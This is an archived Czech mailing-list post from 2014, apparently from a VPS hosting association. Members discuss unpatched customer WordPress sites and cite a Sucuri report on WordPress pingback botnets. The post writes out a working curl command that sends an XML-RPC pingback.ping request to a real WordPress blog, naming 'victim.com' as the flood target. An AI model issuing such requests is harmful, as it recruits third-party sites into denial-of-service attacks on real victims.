16 Mar
2014
16 Mar
'14
2:54 a.m.
On 03/16/2014 02:34 AM, Pavel Snajdr wrote:
Ale at nad tim premejslim z jakyho chci uhlu, proste
nevidim, jak se
tomu vyhnout, krome prevence/osvety...
Coz ale proste nefunguje, protoze tu svobodu mit svuj server maji i
ti, co je to proste nezajima a jenom potrebujou, aby jim ten jejich
eshop jel. S takovyma nadelame neco jenom tezko, protoze ti na to jdou
stylem "install&forget", coz u systemu vystavenych do internetu nejde, no.
Otazka je, jak moc prudit cleny kvuli tomuto. Standardni odpoved na to byva neco
jako bounty program, ale nevim zatim, jak by to mohlo fungovat u zdruzeni typu
vpsfree.
Automatizovat vyhledavani zastaralejch verzi baliku
napric
kontejnerama stejne nezachrani deravy wordpressy nachazejici se na
tech nejnestandardnejsich mistech, prohledavat FS kazdyho kontejneru
takhle se neda. Nevim, moc se s tim asi delat neda no.
Wordpress je zlo: "Notorious botnet comes complete with blogging software"
curl -D - "http://awritersnotepad.wordpress.com/xmlrpc.php" -d
'<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://victim.com</string></value></param><param><value><string>awritersnotepad.wordpress.com/postchosen</string></value></param></params></methodCall>'
Srandovni reply header:
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply
to join the fun, mention this header.
Such source:
http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-di…
Ondro